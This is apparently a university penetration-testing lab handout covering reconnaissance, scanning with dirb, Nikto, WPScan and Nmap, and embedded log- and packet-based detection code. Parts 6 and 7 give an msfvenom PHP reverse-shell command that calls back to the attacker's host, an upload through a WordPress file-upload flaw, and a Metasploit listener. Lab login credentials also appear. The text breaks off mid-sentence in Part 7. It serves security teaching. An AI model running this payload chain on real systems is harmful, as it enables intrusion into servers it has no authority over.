
Penetration Testing Lab

Note: This lab is the same Penetration Testing Lab used for the ELM course CST630, so CST630 is
referenced in several places. Functionally, this does not matter, and you should be able to follow the
directions as written here to perform the lab. Also note that the screenshots in this document are for
illustration purposes and were produced in a different environment before the lab environment you are
using was created, so your screen output may not be identical.
 
Deliverables:  
1. Penetration Testing Report. See directions below.
2. Penetration Testing Lab Exercise Report. Document your lab experience, how you
collected and recorded findings, and include responses to the questions in various parts
of the lab exercise. Make sure your lab report is neatly organized around all the phases of
the penetration testing process. Include appropriate screenshots within your Lab Report.

Directions: Review Appendix A to gain an understanding of the tools used within a penetration
test (pentest), and then complete all the steps in Appendix B. Within Appendix B, you will be
using Kali Linux to gain an understanding of the network and to launch attacks against the
network. Based on the steps you perform within Appendix B, you will need to capture evidence
and write a Penetration Testing Report (review the reference titled Pentest Report on how to
write this report). You will address this report to your organizational leadership and discuss
information about the network, discuss the vulnerabilities you found, and provide your
recommendation to fix the problems. Since the lab is within a closed network (meaning no direct
connection to the Internet), you will also need to answer the questions within Appendix A.

Before starting this lab, review Lab Resources and Lab References.

1. Goal of the Lab Exercise

After the lab exercises, you should be able to attack a network and write a penetration testing
report. You will be required to use some of the tools found on Kali Linux within the
Workspace. To access Workspace, use the UMUC DigitalLabs.pdf. You will use NIXATK01
found within the lab broker.

2. Introduction to Hacking Tools

In other courses, you have learned how to use Nessus and Nmap. Within this lab, you will learn
to use a set of tools used by pentesters and hackers to learn about systems and to attack these
systems. The lab has two appendices. Appendix A introduces you to several tools. Appendix B
walks you through using these tools to conduct a full scope penetration test (or attack) on a lab
network.

Lab Resources

● Within this lab, you will use the following systems:


○ NIXATK01 (Kali)
■ Username: StudentFirst
■ Password: Cyb3rl@b
○ NIXTGT01 (CentOS) (Web Server 1) www.acme.com
○ NIXTGT02 (CentOS) (Web Server 2) www.hr.acme.com
○ WINTGT01 (Windows)

● Lab hot links

These hot links will quickly take you to the linked section of this document.

● Appendix A - Pentesting Tools


○ Nonattack Tools
○ Phase 1 Reconnaissance
■ Questions
○ Phase 2 Scanning
○ Phase 3 Attack and Gaining Access
○ Phases 4 & 5- Maintaining Access and Covering Tracks
● Appendix B - Attacking the Network (this is the actual lab exercise)
○ Part 1
○ Part 2
○ Part 3
○ Part 4
○ Part 5
○ Part 6
○ Part 7
○ Part 8
○ Part 9
○ Part 10
○ Part 11
○ Part 12
○ Part 13
○ Part 14
○ Part 15
○ Part 16
○ Part 17

Lab Reference Information

Metasploit Tutorial
● https://www.youtube.com/watch?v=cnkLv_RE3EI
● https://www.youtube.com/watch?v=TCPyoWHy4eA

Msfvenom Tutorial
● https://www.youtube.com/watch?v=CtVH0MCv3DI
● https://www.youtube.com/watch?v=ugHJMnI_C_E

Pentest Report
● http://www.pentest-standard.org/index.php/Reporting

Weevely
● https://github.com/epinna/weevely3/wiki/Install-and-first-run

Appendix A: Pentesting Tools

In this appendix, you will learn the different phases of attacking a system. You will also gain an
understanding of each tool used in these phases so that you can complete the lab in Appendix B.

To learn the tools within this lab, you will use Kali Linux. Use the following information to log in
to the system:
○ NIXATK01 (Kali)
■ Username: StudentFirst
■ Password: Cyb3rl@b
 
Nonattack Tools

As a penetration tester, you will be required to hunt, gather, and analyze data. Keeping accurate
records of your data collection will be the most challenging, yet critical, aspect of your
penetration testing process. KeepNote is a very useful tool to help you overcome this challenge.
KeepNote allows you to collect data for later use. It allows you to create folders and documents
and to capture screens within the tool. Below is an example of KeepNote:

Source: KeepNote

Within KeepNote, you will see two different rows along the top of the screen. The first row is
similar to what you might see in other graphical applications. The second row is similar to
other common word processing applications. Click on File. The first two buttons below “File” are
“Create a new folder” and “Create a new page”. You will need to start by creating a new
notebook. To do this, click on File and then Create New Notebook. The new notebook window will
open. Give your notebook the name CST630 Demo, then double-click Desktop, and click on
New. In the example image above, you see a folder called CST 630 Demo. In this folder, you
would want to make a page for taking notes during the reconnaissance phase of a test. You can
name this page recon.
Source: KeepNote

Within the CST 630 Demo folder, make a new folder for each system that you find. Make a
folder called ​System 1​.

--------------
Note: Create a different page for each scan type, exploit, and other areas of interest. An
example would be NMAP, WPScan, DIRB, Exploit (Type of Exploit, XSS).
--------------

Source: KeepNote

Under the System 1 folder, make a page called Scan data.

Take a screenshot that looks like the below image:


Source: KeepNote

KeepNote is the single most important tool you will use during a penetration test. This tool will
help you keep track of all of your findings, exploits, and other data that will help you write a
penetration testing report.
 
Phase 1: Reconnaissance

During this phase, use only the Workspace system. You will not use any virtual machines.

The first phase of a test is the reconnaissance. This phase is used to find everything you can
learn about the target. Normally you will use Google and other search engines to learn about
the target. In addition to search engines, you should also use Internet tools such as whois or
other similar tools to look up domains and to collect information. You must catalog all the
information you collect. The next section will show you examples of information collection.

Google
There are many ways to look for information about a company. This can be completed with the
use of search engines such as Google, Bing, or Yahoo. Each of these search engines has
advanced search options that can be used to search for files, words, and other details about a
target company. For this exercise, you will use Google and its advanced search options. Follow
the steps below to collect information about UMUC.

Step-by-Step Instructions

1. You will start with a basic search for a specific site. This is completed with the search term
“site:” followed by the website. The following shows a search that targets UMUC.edu. For
example, in Google, type

site:umuc.edu

Then, take a screenshot of the page:

Source: Google in Firefox browser


2. The next search operation will look for any text that is found within the URL of a website. This
search operator is performed with adding “inurl:” to the search string. For this search, you will
look for all pages that contain cybersecurity within the URL. For example, in Google, type

site:umuc.edu inurl:cybersecurity

Then, take a screenshot of the page:

Source: Google in Firefox browser

3. The next search will look for the file types that can be found on a web server. This search is
done with the use of the command “filetype:” followed by the file type. For example, in Google,
type

site:umuc.edu filetype:pdf

Then, take a screenshot of the page:

Source: Google in Firefox browser


4. The next search will look for text that is found on a web page. This search is done with the
command of “intext:” followed by the text to search for. For example, in Google, type

site:umuc.edu intext:cyber security

Then, take a screenshot of the page:

Source: Google in Firefox browser

5. Outside of using these high-level search commands, you can also combine the advanced
searches. Next, you will combine the use of “intext” and “filetype.” For example, in Google, type

site:umuc.edu filetype:pdf intext:cyber security

Then, take a screenshot of the page:


Source: Google in Firefox browser

Questions

Follow the above steps to complete the following questions.

1. Perform three advanced searches, explain what you were searching for, and then take a
screenshot of each search.
2. For each of the searches, why did the results change? How can you combine the searches to
get fewer results?
3. How can this be used by both black and white hat hackers?
4. What type of information would you look for when performing information gathering?
5. What is the difference between active reconnaissance and passive reconnaissance?
6. Research two other search engines and provide the details to conduct the same type of
information gathering. Provide the search, what you searched for, and a screenshot.
7. You were conducting information gathering of a company website; however, no search
engine provided any details. After reviewing the website, you saw an e-mail address with a
different domain than the website. How can this be used?
 
Phase 2: Scanning

The second phase of an attack is scanning. This is when you will use dirb, Nmap, Nikto, and
other scanners to collect additional information. This section will help you to identify IP
addresses, ports, operating systems, plug-ins, and other details.

dirb

The first tool in your arsenal is dirb. This tool is used to identify both known and unknown
directories of a website. The tool uses a file called a wordlist to generate web requests to a website
in order to identify the directories. Dirb is used by both black and white hat hackers.

To better understand the flags and arguments of dirb (and of any other tool), you should always start
by looking at the help information. To view the dirb help information, enter “dirb” into the
terminal. The tool will print the contents of the help file. Review the help content and make
notes of the output.

The dirb help is broken down into four different sections: Notes, Hotkeys, Options, and
Examples. Notes explains the usage line printed above it, that is, how to supply the
arguments to dirb. Hotkeys are keys you can press to perform different actions during a scan. Options are
used to tell dirb to try different behaviors during a scan. Examples provides examples of how to
write the commands. The following image shows the command which was used to view the help
information and a small sample of the output:
Source: Dirb in terminal
Before running any scans, start by explaining the different flags or options within the dirb help.

-a option
The first option on the list is -a. This is used to change the user agent string. The user agent
string is a set of data that tells the server what type of system requested the information.
Depending on the browser you use, you may see different user agent strings. The
point of this option is to mask the use of dirb and to make it appear as if a browser requested the
content.

-c
The next option on the list is -c, the cookie string, which dirb sends with every request. The cookie
value might have been collected with the use of cross-site scripting, or provided by the client.

-i
The next option is case insensitivity. This option tells dirb to try more requests based on
possible character case. For example, if your wordlist is only in lowercase, the scan may not
return a result for uppercase letters, and vice versa.
-r and -R
The next set of options controls recursive scans. The -r option tells dirb not to recurse, that is, not to
enter newly found directories. The -R option tells dirb to recurse into new directories but to ask before
entering each one.

-X
The last option we will review is the -X option. This option is used to define extensions to also
add to the scan. What happens is that dirb will take the wordlist and add the extensions to the
end of those words.

The dirb help shows four different parts needed for the command to execute. The first part, dirb,
is the text used to start dirb. The next part, <url_base>, is the URL that is being directory
brute-forced. The next part is the wordlist to use for the scan. For the wordlist option to work,
you need to provide the directory location of the wordlist file. The options were explained earlier.

Source: Dirb in terminal

With dirb, you can also run a default scan. A default scan uses dirb's default settings, which
tell it to use the common wordlist and to automatically enter new directories. You get a basic or
default scan by giving dirb only the URL, without a wordlist or other options. The basic scan is
the one most often used with dirb. The following is an example of the command:

_______
Note: Site_to_test.com is not a real website; you need to change this to whatever website
you are testing against.
_______

dirb http://site_to_test.com
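Because the -a option lets dirb hide behind a browser's user agent string, a defender should watch for the behaviour instead. The following Python, an added example rather than part of this handout or of dirb, parses combined-format access log lines (constructed sample data) and flags a client that requests many distinct paths and mostly receives 404s.

```python
"""Spot dirb-style directory brute forcing in combined-format web server logs.

Added example for this lab handout; it is not dirb code and not from the original
document. The log lines below are constructed sample data. The heuristic keys on
behaviour (one client requesting many distinct paths, mostly answered 404) rather
than on the User-Agent header, because the dirb -a option lets a scanner present
a browser's user agent string.
"""
import re
from collections import defaultdict

# Apache/nginx "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_bruteforcers(lines, min_paths=5, min_404_ratio=0.8):
    """Return {client_ip: stats} for clients whose traffic looks like a wordlist walk:
    at least `min_paths` distinct paths, with `min_404_ratio` or more of the
    responses being 404. Unparseable lines are skipped.
    """
    per_ip = defaultdict(lambda: {"paths": set(), "total": 0, "not_found": 0, "agents": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        st = per_ip[rec["ip"]]
        st["total"] += 1
        st["paths"].add(rec["path"])
        st["agents"].add(rec["ua"])
        if rec["status"] == "404":
            st["not_found"] += 1
    flagged = {}
    for ip, st in per_ip.items():
        ratio = st["not_found"] / st["total"]
        if len(st["paths"]) >= min_paths and ratio >= min_404_ratio:
            flagged[ip] = {
                "distinct_paths": len(st["paths"]),
                "ratio_404": round(ratio, 2),
                "agents": sorted(st["agents"]),
            }
    return flagged


# Constructed sample log: 10.0.0.9 walks a wordlist while presenting a browser
# user agent (as dirb -a would); 10.0.0.7 is an ordinary visitor with one stale link.
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0"
SAMPLE_LOG = [
    '10.0.0.9 - - [03/Mar/2019:10:00:01 +0000] "GET /admin HTTP/1.1" 404 196 "-" "%s"' % BROWSER_UA,
    '10.0.0.9 - - [03/Mar/2019:10:00:01 +0000] "GET /backup HTTP/1.1" 404 196 "-" "%s"' % BROWSER_UA,
    '10.0.0.9 - - [03/Mar/2019:10:00:02 +0000] "GET /cgi-bin/ HTTP/1.1" 404 196 "-" "%s"' % BROWSER_UA,
    '10.0.0.9 - - [03/Mar/2019:10:00:02 +0000] "GET /config HTTP/1.1" 404 196 "-" "%s"' % BROWSER_UA,
    '10.0.0.9 - - [03/Mar/2019:10:00:03 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "%s"' % BROWSER_UA,
    '10.0.0.9 - - [03/Mar/2019:10:00:03 +0000] "GET /uploads HTTP/1.1" 404 196 "-" "%s"' % BROWSER_UA,
    '10.0.0.7 - - [03/Mar/2019:10:01:10 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "%s"' % BROWSER_UA,
    '10.0.0.7 - - [03/Mar/2019:10:01:12 +0000] "GET /old.html HTTP/1.1" 404 196 "http://www.acme.com/index.html" "%s"' % BROWSER_UA,
    "this line is not in combined format and is skipped",
]

if __name__ == "__main__":
    for ip, stats in find_bruteforcers(SAMPLE_LOG).items():
        print(ip, stats)
```

On the sample, only 10.0.0.9 is flagged (6 distinct paths, 5 of 6 responses 404); the visitor with a single stale link is not.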

Nikto
Nikto is a web application vulnerability scanner. This scanner is used to identify vulnerabilities of
websites and web applications. This tool, like dirb, has its own set of flags, which can be reviewed
by providing the -Help flag. The next image shows the full list of the help commands:
Source: Nikto in terminal

Like dirb, these flags are used by Nikto to perform different functions. However, the main
difference you will notice when you review the help content of Nikto is the flags that end with a plus symbol.
The plus symbol designates that the flag needs an additional value. We will now review each
of the flags.

-Display+ - This flag allows you to define the following options:

1 - Show redirects: This option tells Nikto to show when the web server has a redirect to
some other location.
2 - Show cookies received: This option tells Nikto to show the cookies used by the web
server.
3 - Show all 200/OK responses: This option tells Nikto to show all 200 response codes
from the web server.
4 - Show URLs which require authentication: This option tells Nikto to show all URLs that
contain an authentication for the web server.
D - Debug Output: This option shows the data that is sent to the web server.
E - Display all HTTP errors: This option shows all HTTP-based error messages and
codes.
P - Print progress to STDOUT: This option shows the status while Nikto is running the
scan.
V - Verbose Output: This option shows or lists everything that Nikto is doing while it is
scanning the web server.
To add this option, you would type this within the terminal:

nikto -h 10.0.0.0 -Display [value]

-Format+ - This option tells Nikto which file format to use during the output of the results.

nikto -h 10.0.0.0 -Format txt

-Help - Shows the help file for Nikto.

-host - The target system to scan. This can be given as an IP address or hostname.

-root+ - This option tells Nikto to start scanning at the defined directory.

To learn more about the options, you can review the following link:

https://cirt.net/nikto2-docs/options.html

The following command shows you how to run a Nikto scan.

nikto -h 10.0.250.200

While Nikto is running, you will see the following within the terminal:

Source: Nikto in terminal

The output you will see in the terminal has two main parts. The first part of the output is placed
within a box drawn with dashes. The information within the box shows the details about the target. The
second part shows the output of the scan results. The scan results section shows information
such as the server, plug-ins, and OSVDB identifiers.

Source: Nikto in terminal

 
WPScan
 
The next tool you will examine is WPScan. This tool is used for scanning WordPress websites.
The tool is rather easy to use but also has its own set of switches. The basic command is

wpscan --url http://ipaddress

Source: WPScan in terminal

 
 
Nmap

How to use Nmap


The usage syntax of Nmap is fairly simple. The scan type is given to ‘nmap’ on the command line
with the -s flag; a ping scan, for example, is "-sP". Other options are
then specified, followed by the hosts or networks to be targeted.

Nmap is flexible in specifying targets. Simply scan one host or scan entire networks by pointing
Nmap to the network address with a "/mask" appended to it. In addition, Nmap will allow you to
specify networks with wild cards, such as 192.168.100.*, which is the same as
192.168.100.0/24. Or in our case, we can indicate the range of target hosts as follows:

192.168.100.103-106

Which hosts are up now? Ping Sweeping


Intruders can sweep entire networks to locate targets with Nmap. This is usually done with a
ping scan by using the "-sP" flag. By default, Nmap will send an ICMP echo and a TCP ACK to
each host it scans. Hosts that respond to either will be considered by Nmap to be up. In this
example, you could scan all hosts on the 192.168.100.0 network.

# sudo nmap -sP 192.168.100.*

(Both Zenmap and the command-line will allow you to enter this command and run the scan, but
Zenmap, due to a software glitch, will change the displayed command-line in the output area to
“nmap -sn 192.168.100.*”; if you run the command in Zenmap, just ignore the display glitch and
note the results.)

Sometimes you may merely want to check the availability of a system without sending ICMP
echo requests, which may be blocked by some sites. In this case, a TCP "ping" sweep can be
used to scan a target's network. A TCP "ping" will send an ACK to each machine on a target
network. Machines that are up should respond with a TCP RST. To use the TCP "ping" option
with a ping scan, include the "-PT" flag to target a specific port on the network you're probing. In
our example, we'll use port 80 (http), which is the default, and it will probably be allowed through
the target's border routers and possibly even its firewall. Note that the targeted port does not
need to be open on the hosts that are being probed to determine if the machine is up or
not. Launch this type of scan as follows:

# sudo nmap -sP -PT80 192.168.100.*

When a potential intruder knows which machines on the target's network are alive, typically the
next step is port scanning.
Any (vulnerable) services available? Port Scanning
Different types of port scans are provided by Nmap: TCP connect, TCP SYN, Stealth FIN, Xmas
Tree, and Null, as well as UDP scans.

TCP connect

When an attacker is using TCP connect scans, Nmap will use the connect() system call to open
connections to interesting ports on the target host and complete the three-way TCP handshake.
The probe is easily detected by the target host. Logs on the host machine will show these ports
being opened by the attacker. A TCP connect scan is used with the "-sT" flag as:

# sudo nmap -sT 192.168.100.103-106

Stealth Scanning

What if an attacker wants to scan a host without being logged on the target machine? TCP SYN
scans are less prone to logging on the target's machine, because a full handshake never
completes. A SYN scan starts by sending a SYN packet, which is the first packet in TCP
negotiation. Any open ports will respond with a SYN|ACK, as they should. However, the attacker
sends a RST instead of an ACK, which terminates the connection. The advantage is that the
three-way handshake never completes, and fewer sites will log this type of probe. Ports that are
closed will respond to the initial SYN with a RST, allowing Nmap to determine that the host isn't
listening on that port. This command might require root privileges, which could be
obtained by trying the "sudo" command at the knoppix prompt. The "-sS" flag will launch a
SYN scan against a host or network as:

# sudo nmap -sS 192.168.100.103-106

Although SYN scans are more likely to go unnoticed, they can still be detected by some
intrusion detection countermeasures. The Stealth FIN, Xmas Tree, and Null scans are used to
evade packet filters and firewalls that may be watching for SYN packets directed toward
restricted ports. These three scans should return a RST for closed ports, whereas open ports
should drop the packet. A FIN "-sF" scan will send a FIN packet to each port, whereas the Xmas
Tree scan "-sX" turns on the FIN, URG, and PUSH flags, and a Null scan "-sN" turns off all
flags. Because of Microsoft's noncompliance with TCP standards, the FIN, Xmas Tree,
and Null scans are only effective on non-Microsoft operating systems.
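The flag combinations just described are also what a defender's sensor keys on. As an added example (not from the original handout and not Nmap code), the following Python classifies TCP probes by exactly those flag bits and reports a source that probes several ports with one technique; the packet records are constructed sample data.

```python
"""Classify TCP probes by their flag bits and summarise scan activity per source.

Added example for this lab handout; it is not part of the original document and
not Nmap code. The packet records are constructed sample data, not a capture.
The technique names follow the scans described above: SYN-only (-sS), FIN-only
(-sF), FIN+URG+PSH (-sX, Xmas Tree), no flags (-sN, Null) and a bare ACK probe
as used by the TCP "ping" (-PT).
"""
from collections import defaultdict

# TCP header flag bits.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def classify_probe(flags: int) -> str:
    """Map a TCP flag byte to the scan technique it most resembles.

    Returns 'syn', 'fin', 'xmas', 'null', 'ack' for probe shapes and 'other'
    for anything else (SYN|ACK replies, data segments, RSTs, ...).
    """
    if flags == SYN:
        return "syn"        # first packet of a handshake, or a -sS probe
    if flags == FIN:
        return "fin"        # -sF: a FIN without ACK is never sent by a real session
    if flags == (FIN | URG | PSH):
        return "xmas"       # -sX: FIN, URG and PUSH "lit up" together
    if flags == 0:
        return "null"       # -sN: no flags at all
    if flags == ACK:
        return "ack"        # -PT style TCP "ping": unsolicited ACK, expects RST
    return "other"


def summarise_scans(packets, min_ports=3):
    """Group probe-shaped packets by (source, technique) and keep the sources
    that touched at least `min_ports` distinct destination ports.

    `packets` is an iterable of dicts with keys src, dst, dport and flags.
    Returns {(src, technique): sorted list of ports}. A lone SYN to one port
    is normal traffic; SYNs to many ports from one source is a scan.
    """
    seen = defaultdict(set)
    for pkt in packets:
        kind = classify_probe(pkt["flags"])
        if kind != "other":
            seen[(pkt["src"], kind)].add(pkt["dport"])
    return {key: sorted(ports) for key, ports in seen.items() if len(ports) >= min_ports}


# Constructed sample records: an Xmas scan of four ports from .50, a SYN probe
# of two ports from .51 (below the threshold) and a normal session from .52.
SAMPLE_PACKETS = (
    [{"src": "192.168.100.50", "dst": "192.168.100.103", "dport": p, "flags": FIN | URG | PSH}
     for p in (21, 23, 53, 80)]
    + [{"src": "192.168.100.51", "dst": "192.168.100.103", "dport": p, "flags": SYN}
       for p in (22, 443)]
    + [{"src": "192.168.100.52", "dst": "192.168.100.103", "dport": 80, "flags": SYN},
       {"src": "192.168.100.52", "dst": "192.168.100.103", "dport": 80, "flags": ACK | PSH}]
)

if __name__ == "__main__":
    for (src, kind), ports in summarise_scans(SAMPLE_PACKETS).items():
        print(f"{src}: {kind} scan of ports {ports}")
```
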

UDP Scanning

Using the UDP scan "-sU", an attacker can determine what ports are open to UDP on a host.
Nmap will send a 0-byte UDP packet to each port. If the host returns a "port unreachable"
message, that port is considered closed. This method can be time-consuming because most
UNIX hosts limit the rate of ICMP errors. Fortunately, Nmap detects this rate and slows itself
down, so as not to overflow the target with messages that would have been ignored. Launch a
UDP scan as follows (Nmap takes multiple targets separated by spaces, not commas):

# sudo nmap -sU 192.168.100.103 192.168.100.105 192.168.100.106

Which OS is running on the host? OS Fingerprinting

Often, an intruder may be more familiar with exploits for a particular operating system and may
be looking for machines to compromise easily. A common option is TCP/IP fingerprinting with
the "-O" option to determine the remote operating system. This has to be combined with a
port scan and not a ping scan. Nmap accomplishes this by sending different types of probes
to the host, which narrow down the target operating system. Fingerprinting the TCP stack includes
such techniques as FIN probing to see what kind of response the target gives, BOGUS flag
probing to see the remote host's reaction to undefined flags sent with a SYN packet, TCP Initial
Sequence Number (ISN) sampling to find patterns in ISN values, as well as other methods of
determining the remote operating system.

# sudo nmap -sS -O 192.168.100.103-106

The TCP Sequence Prediction tells us how difficult TCP sequence number prediction is for the
remote host. This is valuable to an attacker looking for hosts that can be vulnerable to session
hijacking.

Other Options

-P0 Do not try to ping hosts at all before scanning them. Since Nmap will ping a target with
both TCP "ping" and ICMP echo before attempting a port scan, sites blocking ICMP and TCP
probes will not be scanned by default.

"-v" This is the verbose option and can be used with all types of scans. You can use this flag once,
or even twice, to get more information about the target's machine.

The ability to target specific ports is accomplished with the "-p" option. For instance, if an
attacker wanted to probe your web server for ftp (port 21), telnet (port 23), name service (port
53), and http (port 80), and wanted to know the OS you were using, he/she may try the SYN
scan:

# sudo nmap -sS -p 21,23,53,80 -O -v 192.168.100.103

“-iR” Use this option to instruct nmap to scan random hosts.

For a complete list of the options for Nmap, see the Nmap manual at
http://www.insecure.org/nmap.

Quick Start of Nmap

Here are some examples of NMap commands to do specific scans:

Ping Sweeping
ICMP ping          # sudo nmap -sP “host IP address”
TCP ping           # sudo nmap -sP -PT80 “host IP address”

Port Scanning
TCP connect        # sudo nmap -sT “host IP address”
Stealth scanning   # sudo nmap -sS “host IP address”
UDP scanning       # sudo nmap -sU “host IP address”
Stealth FIN        # sudo nmap -sF “host IP address”
Xmas Tree          # sudo nmap -sX “host IP address”
Null scan          # sudo nmap -sN “host IP address”

OS Fingerprinting  # sudo nmap -sS -O “host IP address”

Remember that all of the information collected within this phase needs to be stored. The first
two phases of an attack change how you will attack the network. After you collect the
information, you will then turn to the Internet to search for possible exploits. You will look at
different software, people, tools, and other data that would help you identify how to attack
the network.

Before the next phase begins, you will also develop an attack scenario. The attack scenario will
then be used within an offline test. This offline test would be conducted on a network or other
systems that are as close as possible to what you understand the target network to be. This round of testing is
completed to ensure that the tests that you perform will not cause a denial of service. Outside of
the government, downed systems could cost your company and client income.

Burp Suite
 
Burp Suite is a unique tool which can be used within many different areas of an attack. The tool
allows for scanning, crawling, and proxying requests. There are two different versions of Burp
Suite: paid and free. The free version does not have a scanning tool, whereas the paid version
does. The below image shows the Burp Suite running:

Source: Burp Suite

Along the top of the screen, you will see 12 different selections, or parts of the tool. Those are
Target, Proxy, Spider, Scanner, Intruder, Repeater, Decoder, Comparer, Extender, Options, and
Alerts.

Click on Target. Under Target, you have two more buttons: Site Map and Scope. Site Map
shows you the site map of hosts that Burp Suite saw traffic for. Scope allows you to define
which systems are in or out of scope.

Click on Proxy. The proxy part of Burp Suite allows you to capture traffic as it is leaving your
host and modify the traffic as it is going to the server. To use this part of Burp Suite, set your
browser to use Burp Suite as a proxy.

You can review the other parts of Burp Suite as you like.

Phase 3: Attack and Gaining Access

The attack phase of the test is where you use what you learned about the network to gain
access to the systems and network. Some of the tools used within this phase are Metasploit and
MSFVenom. Metasploit has a wide range of use. MSFVenom, on the other hand, is used for
building payloads for exploiting a system.

You can watch the videos within the references to learn more about both tools.

Phases 4 & 5: Maintaining Access and Covering Tracks

The last two phases of an attack are Maintaining Access and Covering Tracks. Research both
of these and write a paragraph explaining what happens within both of those phases.

Appendix B: Attacking the Network (this is the actual lab)

After gaining an understanding of the tools and techniques introduced to you in Appendix A, you
will now use these tools and techniques to perform the lab. There are 17 parts to the lab.
Complete each part carefully to complete the entire lab exercise. Some parts have questions
that you will need to respond to. Always take screenshots of important findings to complete the
report and to document your lab experience.

Log in to Kali Linux with the following information:

○ NIXATK01 (Kali)
■ Username: StudentFirst
■ Password: Cyb3rl@b

Part 1
Because the network is not crawled by the search engines, you will conduct active recon of
the network. To do this, you will use a tool called HTTrack to clone the website to your attack
machine. Before you clone the website, create a new folder.

On the desktop, right-click and select “create folder”. Name the folder websites_clone. The
desktop should look like the following image.

Source: Kali desktop


Next, you will need to open a terminal.

--------------
Note: You can open a terminal from two different locations. The first is the terminal icon at the
bottom of the screen within the dock. The other is from the Application button at the top left
of the screen. The icon looks the same as the one found within the dock.
--------------

Click on the terminal icon to open a new terminal session. Change the current directory from
/home/StudentFirst to /home/StudentFirst/Desktop/website_clone. You need to do this so that
the website is copied into the folder you created. To do this, enter the following command:

cd /home/StudentFirst/Desktop/website_clone

Source: Terminal

Run HTTrack to clone the website:

sudo httrack http://www.acme.com

--------------
Note: When you supply the sudo command, you will see the following error message. Do not be
alarmed; this is normal within this environment.

Source: Terminal
--------------

You will start to see a lot of output scrolling in the terminal. See the figure below:
Source: HTTrack in terminal

After HTTrack has completed, go to the folder that you created and open the index.html file.
You will see a website that says that you have gone to the wrong location. This means that the
website serves its home page from a different directory.

Source: HTML made for lab in Firefox

Next, open the browser and go to the website. You should see the same page that you copied.
Now that the website is open, right-click on the webpage and select View page source. Review
the page and look for any comments on the page.

Take a screenshot.

Part 2
The next phase is the scanning phase, which means that you will now be actively sending
requests to the website. The first thing you will do is scan the website with Nmap. Run the
following command, and then answer the questions below based on what the Nmap scan of the web server shows:

sudo nmap -v -sSV -p 1-1024 www.acme.com

Source: Nmap in terminal


● What ports are listening?
● What services did NMap identify?
● Anything else of value?

Source: Nmap in terminal

Include your answers in the final report.

Part 3
Next, you need to identify the directories of the website. Use dirb to scan the website.

Within the terminal, type the following command:

sudo dirb http://www.acme.com

You will see something like this within the terminal.


Source: Dirb in terminal

Now that dirb has identified the directories, you will begin to use other tools.

Answer the following question:

Within your report, identify all of the directories and files that dirb found.

Include your answer in the final report.


Source: Dirb in terminal

Part 4
You will start by scanning with Nikto.
Within the terminal window, type the following command:

sudo nikto -h http://www.acme.com/wordpress

Source: Nikto in terminal

After the Nikto scan has completed, answer the following questions:

1. Compare these with the ports found within the Nmap scan. Do you see anything different?
2. What are the cookies found on the website?
3. Select three different OSVDB found within the scan. Do a Google search for the three
that you selected. Explain any information that you found about those OSVDBs.
4. Does Nikto show or list plugins used by the web server?
5. What is WordPress used for?

Include your answers in the final report.

Part 5
Now that you know that the web server is definitely running WordPress, you will scan the
web server with WPScan.

Run the following command:

sudo wpscan -u http://www.acme.com/wordpress

WPScan will ask you if you want to update the scanner. Type N for no and hit Enter. You will
then see the following information.
Source: WPScan in terminal

When WPScan is completed, review the information. Each information item begins with red,
yellow, or green plus signs. Red plus signs mean that the web server is vulnerable to
something. Review the details of each item and answer the following questions:

1. How many alerts and vulnerabilities are there?


2. What is the total number of red, yellow, and green items?
3. Do you see any vulnerabilities that allow remote code execution or arbitrary file
upload? Are there any other red alerts?
4. What is a remote code execution (RCE), and arbitrary file upload?
5. Select the vulnerability that has the highest risk and explain how it is exploited.

Include your answers in the final report.

Part 6
Now that you have identified the vulnerabilities, you can begin to attack the network. Since
WordPress has an arbitrary file upload vulnerability, you will create a PHP shell that calls
back to the attacking system. You will start a listener, upload the shell, and then run it. In
this section, you will learn how to exploit the web server.

To make the shell, you will use msfvenom to create the file that will be uploaded to the web
server. On the attacking machine, open a new terminal and type the following command on one
line. LHOST is the Kali host's address that the shell will call back to and LPORT is the port
the listener in Part 7 will bind; the two must match on both sides:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.101 LPORT=80 -e php/base64 -f raw > /home/StudentFirst/Desktop/msfvenom.php

When the command is completed, you will see the following output:

Source: Msfvenom in terminal

The next step is to add the PHP open and close tags. The raw, base64-encoded output contains no
<?php tag, so if it were uploaded as-is the web server would serve it as plain text instead of
executing it. Go to the desktop and open msfvenom.php by right-clicking on the file and
selecting Leafpad. When you open the file, it will look like unreadable code. Type <?php at the
very beginning and ?> at the very end of the file. The file should look like the following image:

Source: Leafpad

Now, open the “Download CST630 Project Resource” file found under Lab Resources and
Projects, which is located on the desktop. Under project 1 click on WP Exploit [www.acme.com].
When the web page is open you will see the following web page.

Source: Firefox browser

Now, you need to upload the file to the web server. Click on the “Browse..” button and select the
msfvenom.php file. After the file is selected, you will need to click on the “upload!” button.
Source: Firefox browser

When the file is uploaded, you will see {"success":true,"fileName":"\/\/\/msfvenomtest.php"}
on the web page (the fileName value is the name the server stored your file under). This means
that the file was uploaded to the web server.

Source: WordPress in Firefox browser

After the file is uploaded, make sure you can see it within the directory listing on the web server.
The dirb scan showed a listing of the upload directory. Go to the upload directory on the web
server. Once you reach the upload directory, take a screenshot showing that you found the
location of the file. You should see the following.

Source: WordPress in Firefox

Part 7
Now, you need to set up the listener on the attack machine. Open a terminal window and type
the following command to open Metasploit:
sudo msfconsole

Wait for Metasploit to complete the load process. When it is completed, you will see the
following window:

Source: Metasploit in terminal

When it completes the loading process, you will need to enter the following commands:

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.10.101
set lport 80
exploit

You will see the following in the terminal window. This tells you that the listener has been
created and Metasploit is waiting for the session. The handler binds port 80 on the Kali host,
which is why msfconsole was started with sudo; make sure nothing else on Kali is already
listening on that port.
Source: Metasploit in terminal

Now go to the upload directory and click on the php file that you uploaded. After you click on the
